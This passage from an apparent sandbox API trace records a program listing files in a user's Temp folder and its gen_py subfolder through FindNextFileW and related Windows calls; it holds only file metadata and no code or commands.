FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70e4840, ftCreationTime.dwHighDateTime=0x1d7df3b, ftLastAccessTime.dwLowDateTime=0xd95d4610, ftLastAccessTime.dwHighDateTime=0x1d7e680, ftLastWriteTime.dwLowDateTime=0xd95d4610, ftLastWriteTime.dwHighDateTime=0x1d7e680, nFileSizeHigh=0x0, nFileSizeLow=0x6335, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZw3Jd.swf", cAlternateFileName="")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabb5ce90, ftCreationTime.dwHighDateTime=0x1d7e085, ftLastAccessTime.dwLowDateTime=0x6f6ea190, ftLastAccessTime.dwHighDateTime=0x1d7e23e, ftLastWriteTime.dwLowDateTime=0x6f6ea190, ftLastWriteTime.dwHighDateTime=0x1d7e23e, nFileSizeHigh=0x0, nFileSizeLow=0xd8a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJjVXXxADPn56.mp3", cAlternateFileName="FJJVXX~1.MP3")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x799de350, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x852aa500, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x852aa500, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FXSAPIDebugLogFile.txt", cAlternateFileName="FXSAPI~1.TXT")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdb0e12d0, ftCreationTime.dwHighDateTime=0x1d7dd4a, ftLastAccessTime.dwLowDateTime=0xeeea4690, ftLastAccessTime.dwHighDateTime=0x1d7df69, ftLastWriteTime.dwLowDateTime=0xeeea4690, ftLastWriteTime.dwHighDateTime=0x1d7df69, nFileSizeHigh=0x0, nFileSizeLow=0x1686d, dwReserved0=0x0, dwReserved1=0x0, cFileName="gAsVIEtfMcgKxyY_.jpg", cAlternateFileName="GASVIE~1.JPG")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gen_py", cAlternateFileName="")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2cc40ec0, ftCreationTime.dwHighDateTime=0x1d7e2c5, ftLastAccessTime.dwLowDateTime=0x75ce81d0, ftLastAccessTime.dwHighDateTime=0x1d7e519, ftLastWriteTime.dwLowDateTime=0x75ce81d0, ftLastWriteTime.dwHighDateTime=0x1d7e519, nFileSizeHigh=0x0, nFileSizeLow=0x1489c, dwReserved0=0x0, dwReserved1=0x0, cFileName="GHt0.bmp", cAlternateFileName="")) returned 1 [0221.742] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2195d0b0, ftCreationTime.dwHighDateTime=0x1d7e644, ftLastAccessTime.dwLowDateTime=0x54573140, ftLastAccessTime.dwHighDateTime=0x1d7e6d2, ftLastWriteTime.dwLowDateTime=0x54573140, ftLastWriteTime.dwHighDateTime=0x1d7e6d2, nFileSizeHigh=0x0, nFileSizeLow=0x83c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="HFvUrds.xlsx", cAlternateFileName="HFVURD~1.XLS")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5ab2a0, ftCreationTime.dwHighDateTime=0x1d7d822, ftLastAccessTime.dwLowDateTime=0x777c85b0, ftLastAccessTime.dwHighDateTime=0x1d7de23, ftLastWriteTime.dwLowDateTime=0x777c85b0, ftLastWriteTime.dwHighDateTime=0x1d7de23, nFileSizeHigh=0x0, nFileSizeLow=0x1584a, dwReserved0=0x0, dwReserved1=0x0, cFileName="ikU6TeOGYU.wav", cAlternateFileName="IKU6TE~1.WAV")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdfc7a950, ftCreationTime.dwHighDateTime=0x1d7e397, ftLastAccessTime.dwLowDateTime=0xd2af35a0, ftLastAccessTime.dwHighDateTime=0x1d7e6a1, ftLastWriteTime.dwLowDateTime=0xd2af35a0, ftLastWriteTime.dwHighDateTime=0x1d7e6a1, nFileSizeHigh=0x0, nFileSizeLow=0x12997, dwReserved0=0x0, dwReserved1=0x0, cFileName="iNv4KnvVdQ_-XbhT0.png", cAlternateFileName="INV4KN~1.PNG")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xffd2570, ftCreationTime.dwHighDateTime=0x1d7e503, ftLastAccessTime.dwLowDateTime=0xb1436270, ftLastAccessTime.dwHighDateTime=0x1d7e6c8, ftLastWriteTime.dwLowDateTime=0xb1436270, ftLastWriteTime.dwHighDateTime=0x1d7e6c8, nFileSizeHigh=0x0, nFileSizeLow=0x8984, dwReserved0=0x0, dwReserved1=0x0, cFileName="JbuoOpF29.wav", cAlternateFileName="JBUOOP~1.WAV")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x544ea3e0, ftCreationTime.dwHighDateTime=0x1d7e2ef, ftLastAccessTime.dwLowDateTime=0xec9d1930, ftLastAccessTime.dwHighDateTime=0x1d7e572, ftLastWriteTime.dwLowDateTime=0xec9d1930, ftLastWriteTime.dwHighDateTime=0x1d7e572, nFileSizeHigh=0x0, nFileSizeLow=0x6e1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="jJgM6v.swf", cAlternateFileName="")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x522d68b0, ftCreationTime.dwHighDateTime=0x1d7e43b, ftLastAccessTime.dwLowDateTime=0x11c81120, ftLastAccessTime.dwHighDateTime=0x1d7e716, ftLastWriteTime.dwLowDateTime=0x11c81120, ftLastWriteTime.dwHighDateTime=0x1d7e716, nFileSizeHigh=0x0, nFileSizeLow=0x4702, dwReserved0=0x0, dwReserved1=0x0, cFileName="KD79Kg.ots", cAlternateFileName="")) returned 1 [0221.743] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x490aa8f0, ftCreationTime.dwHighDateTime=0x1d7dfe1, ftLastAccessTime.dwLowDateTime=0xfe977f00, ftLastAccessTime.dwHighDateTime=0x1d7e17a, ftLastWriteTime.dwLowDateTime=0xfe977f00, ftLastWriteTime.dwHighDateTime=0x1d7e17a, nFileSizeHigh=0x0, nFileSizeLow=0x6de9, dwReserved0=0x0, dwReserved1=0x0, cFileName="kvg4 fbaULsO.bmp", cAlternateFileName="KVG4FB~1.BMP")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcb83e350, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcb83e350, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcb83e350, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b30baa0, ftCreationTime.dwHighDateTime=0x1d7dd66, ftLastAccessTime.dwLowDateTime=0xaa479630, ftLastAccessTime.dwHighDateTime=0x1d7e051, ftLastWriteTime.dwLowDateTime=0xaa479630, ftLastWriteTime.dwHighDateTime=0x1d7e051, nFileSizeHigh=0x0, nFileSizeLow=0xd5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="maFKZ1l2S-ZrrckNEk.csv", cAlternateFileName="MAFKZ1~1.CSV")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9ef2e1c0, ftCreationTime.dwHighDateTime=0x1d7df59, ftLastAccessTime.dwLowDateTime=0x46a66d10, ftLastAccessTime.dwHighDateTime=0x1d7e1f8, ftLastWriteTime.dwLowDateTime=0x46a66d10, ftLastWriteTime.dwHighDateTime=0x1d7e1f8, nFileSizeHigh=0x0, nFileSizeLow=0xf0db, dwReserved0=0x0, dwReserved1=0x0, cFileName="mGQW.swf", cAlternateFileName="")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc74ffad0, ftCreationTime.dwHighDateTime=0x1d7da2d, ftLastAccessTime.dwLowDateTime=0x7e9559c0, ftLastAccessTime.dwHighDateTime=0x1d7e00e, ftLastWriteTime.dwLowDateTime=0x7e9559c0, ftLastWriteTime.dwHighDateTime=0x1d7e00e, nFileSizeHigh=0x0, nFileSizeLow=0x1829e, dwReserved0=0x0, dwReserved1=0x0, cFileName="o7yH3LaZ4tw.bmp", cAlternateFileName="O7YH3L~1.BMP")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc73ddfa0, ftCreationTime.dwHighDateTime=0x1d7d8ff, ftLastAccessTime.dwLowDateTime=0xaf2d75b0, ftLastAccessTime.dwHighDateTime=0x1d7e552, ftLastWriteTime.dwLowDateTime=0xaf2d75b0, ftLastWriteTime.dwHighDateTime=0x1d7e552, nFileSizeHigh=0x0, nFileSizeLow=0xb092, dwReserved0=0x0, dwReserved1=0x0, cFileName="OnFMqEa.avi", cAlternateFileName="")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe56df930, ftCreationTime.dwHighDateTime=0x1d7dc90, ftLastAccessTime.dwLowDateTime=0x8a6bd2c0, ftLastAccessTime.dwHighDateTime=0x1d7dfd1, ftLastWriteTime.dwLowDateTime=0x8a6bd2c0, ftLastWriteTime.dwHighDateTime=0x1d7dfd1, nFileSizeHigh=0x0, nFileSizeLow=0x108f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="QEdX.gif", cAlternateFileName="")) returned 1 [0221.744] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7229cf0, ftCreationTime.dwHighDateTime=0x1d7e5ff, ftLastAccessTime.dwLowDateTime=0x674ac7f0, ftLastAccessTime.dwHighDateTime=0x1d7e76b, ftLastWriteTime.dwLowDateTime=0x674ac7f0, ftLastWriteTime.dwHighDateTime=0x1d7e76b, nFileSizeHigh=0x0, nFileSizeLow=0x19be, dwReserved0=0x0, dwReserved1=0x0, cFileName="qjaQ71c_O33KsUOxuKe.jpg", cAlternateFileName="QJAQ71~1.JPG")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x50c479f0, ftCreationTime.dwHighDateTime=0x1d7d7f2, ftLastAccessTime.dwLowDateTime=0xd4c01a60, ftLastAccessTime.dwHighDateTime=0x1d7db13, ftLastWriteTime.dwLowDateTime=0xd4c01a60, ftLastWriteTime.dwHighDateTime=0x1d7db13, nFileSizeHigh=0x0, nFileSizeLow=0x9c0f, dwReserved0=0x0, dwReserved1=0x0, cFileName="RN4wn84z2ATckzS.mp4", cAlternateFileName="RN4WN8~1.MP4")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x439394c0, ftCreationTime.dwHighDateTime=0x1d7dc87, ftLastAccessTime.dwLowDateTime=0x6eaaea20, ftLastAccessTime.dwHighDateTime=0x1d7e243, ftLastWriteTime.dwLowDateTime=0x6eaaea20, ftLastWriteTime.dwHighDateTime=0x1d7e243, nFileSizeHigh=0x0, nFileSizeLow=0x2ff1, dwReserved0=0x0, dwReserved1=0x0, cFileName="sFVU8VQDJccy.mp4", cAlternateFileName="SFVU8V~1.MP4")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x409c6c40, ftCreationTime.dwHighDateTime=0x1d7e152, ftLastAccessTime.dwLowDateTime=0x39af24b0, ftLastAccessTime.dwHighDateTime=0x1d7e28b, ftLastWriteTime.dwLowDateTime=0x39af24b0, ftLastWriteTime.dwHighDateTime=0x1d7e28b, nFileSizeHigh=0x0, nFileSizeLow=0x128bb, dwReserved0=0x0, dwReserved1=0x0, cFileName="t0LvOO2CEh2dNVMBUN.jpg", cAlternateFileName="T0LVOO~1.JPG")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2958c960, ftCreationTime.dwHighDateTime=0x1d7dca8, ftLastAccessTime.dwLowDateTime=0x2c31a20, ftLastAccessTime.dwHighDateTime=0x1d7dd03, ftLastWriteTime.dwLowDateTime=0x2c31a20, ftLastWriteTime.dwHighDateTime=0x1d7dd03, nFileSizeHigh=0x0, nFileSizeLow=0xcdd, dwReserved0=0x0, dwReserved1=0x0, cFileName="u2SemsU5T_mEvVKm3r.wav", cAlternateFileName="U2SEMS~1.WAV")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc15740, ftCreationTime.dwHighDateTime=0x1d7e22a, ftLastAccessTime.dwLowDateTime=0x35fac500, ftLastAccessTime.dwHighDateTime=0x1d7e609, ftLastWriteTime.dwLowDateTime=0x35fac500, ftLastWriteTime.dwHighDateTime=0x1d7e609, nFileSizeHigh=0x0, nFileSizeLow=0x1262c, dwReserved0=0x0, dwReserved1=0x0, cFileName="uCWMH.swf", cAlternateFileName="")) returned 1 [0221.745] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe14ec20, ftCreationTime.dwHighDateTime=0x1d7e350, ftLastAccessTime.dwLowDateTime=0x64418a70, ftLastAccessTime.dwHighDateTime=0x1d7e398, ftLastWriteTime.dwLowDateTime=0x64418a70, ftLastWriteTime.dwHighDateTime=0x1d7e398, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="UkkP50TVPpbCSo56b1I9.bmp", cAlternateFileName="UKKP50~1.BMP")) returned 1 [0221.746] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd6dc1d80, ftCreationTime.dwHighDateTime=0x1d7e0ae, ftLastAccessTime.dwLowDateTime=0x87a2caf0, ftLastAccessTime.dwHighDateTime=0x1d7e664, ftLastWriteTime.dwLowDateTime=0x87a2caf0, ftLastWriteTime.dwHighDateTime=0x1d7e664, nFileSizeHigh=0x0, nFileSizeLow=0xef3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="vKVO1XSKvA.png", cAlternateFileName="VKVO1X~1.PNG")) returned 1 [0221.746] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b632f80, ftCreationTime.dwHighDateTime=0x1d7dc45, ftLastAccessTime.dwLowDateTime=0x48fd6840, ftLastAccessTime.dwHighDateTime=0x1d7e2af, ftLastWriteTime.dwLowDateTime=0x48fd6840, ftLastWriteTime.dwHighDateTime=0x1d7e2af, nFileSizeHigh=0x0, nFileSizeLow=0x8bb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="VmFgiOIY03zWeF.pptx", cAlternateFileName="VMFGIO~1.PPT")) returned 1 [0221.746] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1b2458b0, ftCreationTime.dwHighDateTime=0x1d7de91, ftLastAccessTime.dwLowDateTime=0xf91bc530, ftLastAccessTime.dwHighDateTime=0x1d7e329, ftLastWriteTime.dwLowDateTime=0xf91bc530, ftLastWriteTime.dwHighDateTime=0x1d7e329, nFileSizeHigh=0x0, nFileSizeLow=0x182b5, dwReserved0=0x0, dwReserved1=0x0, cFileName="WBDX.bmp", cAlternateFileName="")) returned 1 [0221.746] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x99411110, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0x99411110, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0x99411110, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPDNSE", cAlternateFileName="")) returned 1 [0221.746] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b7eedd0, ftCreationTime.dwHighDateTime=0x1d7dda4, ftLastAccessTime.dwLowDateTime=0xff941ba0, ftLastAccessTime.dwHighDateTime=0x1d7e0c3, ftLastWriteTime.dwLowDateTime=0xff941ba0, ftLastWriteTime.dwHighDateTime=0x1d7e0c3, nFileSizeHigh=0x0, nFileSizeLow=0xe5a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="XeOGUWW.gif", cAlternateFileName="")) returned 1 [0221.747] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x14624f80, ftCreationTime.dwHighDateTime=0x1d7e55f, ftLastAccessTime.dwLowDateTime=0x8005b7b0, ftLastAccessTime.dwHighDateTime=0x1d7e666, ftLastWriteTime.dwLowDateTime=0x8005b7b0, ftLastWriteTime.dwHighDateTime=0x1d7e666, nFileSizeHigh=0x0, nFileSizeLow=0x121a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="xZ1KJhdzKR6Yqg.m4a", cAlternateFileName="XZ1KJH~1.M4A")) returned 1 [0221.747] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9f282e20, ftCreationTime.dwHighDateTime=0x1d7e431, ftLastAccessTime.dwLowDateTime=0x3f9da370, ftLastAccessTime.dwHighDateTime=0x1d7e640, ftLastWriteTime.dwLowDateTime=0x3f9da370, ftLastWriteTime.dwHighDateTime=0x1d7e640, nFileSizeHigh=0x0, nFileSizeLow=0x9f08, dwReserved0=0x0, dwReserved1=0x0, cFileName="x_cMy.jpg", cAlternateFileName="")) returned 1 [0221.747] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2760670, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd2760670, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd2760670, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF1465A4AEF7E2199D.TMP", cAlternateFileName="~DF146~1.TMP")) returned 1 [0221.747] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xd22e9d30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd22e9d30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd22e9d30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF24DDEEEC7F55E878.TMP", cAlternateFileName="~DF24D~1.TMP")) returned 1 [0221.747] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd22e9d30, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd22e9d30, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd22e9d30, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF79E3E0FEAD5D8EA6.TMP", cAlternateFileName="~DF79E~1.TMP")) returned 1 [0221.748] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xd2760670, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xd2760670, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xd2760670, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x200, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DF8EBD431AC1E92770.TMP", cAlternateFileName="~DF8EB~1.TMP")) returned 1 [0221.748] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xccd5e690, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xccd5e690, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xccd5e690, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFC4C8BA9F1B42FB44.TMP", cAlternateFileName="~DFC4C~1.TMP")) returned 1 [0221.748] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xcbc1c710, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcbc1c710, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcbc1c710, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFE9C5F3265BA7C071.TMP", cAlternateFileName="~DFE9C~1.TMP")) returned 1 [0221.748] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2120, ftCreationTime.dwLowDateTime=0xcbc1c710, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xcbc1c710, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xcbc1c710, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="~DFE9C5F3265BA7C071.TMP", cAlternateFileName="~DFE9C~1.TMP")) returned 0 [0221.748] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.749] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0221.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.749] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py", lpFilePart=0x0) returned 0x2c [0221.749] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\gen_py\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.750] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.750] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 1 [0221.750] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xc9548030, ftCreationTime.dwHighDateTime=0x1d7e793, ftLastAccessTime.dwLowDateTime=0xc9548030, ftLastAccessTime.dwHighDateTime=0x1d7e793, ftLastWriteTime.dwLowDateTime=0xc9548030, ftLastWriteTime.dwHighDateTime=0x1d7e793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 0 [0221.751] FindClose (in: 